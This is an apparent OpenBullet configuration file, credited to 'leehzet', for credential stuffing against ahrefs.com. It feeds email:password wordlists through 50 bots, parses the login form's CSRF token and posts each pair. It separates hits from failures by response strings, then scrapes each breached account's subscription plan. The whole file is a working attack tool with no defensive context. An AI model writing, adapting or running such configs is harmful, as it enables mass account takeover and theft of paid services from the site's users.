[SETTINGS]
{
  "Name": "ahrefs.com",
  "SuggestedBots": 50,
  "LastModified": "2018-08-26T10:14:32.7712891+00:00",
  "AdditionalInfo": "",
  "Author": "leehzet",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://ahrefs.com/user/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" CSS "[name=_token]" "value" 0 -> VAR "token" "" "" 
REQUEST POST "https://ahrefs.com/user/login" AutoRedirect=TRUE 
  CONTENT "_token=<token>&email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8;json" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://ahrefs.com/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Incorrect email or password" 
  KEYCHAIN Success OR 
    KEY "\">Sign out</" 
REQUEST GET "https://ahrefs.com/user/subscriptions" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://ahrefs.com/user/subscriptions" 
PARSE "<SOURCE>" LR "<h3 class=\"font-size-18 m-b-px10 p-b-px7\">" "</strong> <span class=\"font-size-14 font-weight-normal dim-low\">" Recursive=FALSE -> VAR "Plan" "" "" 
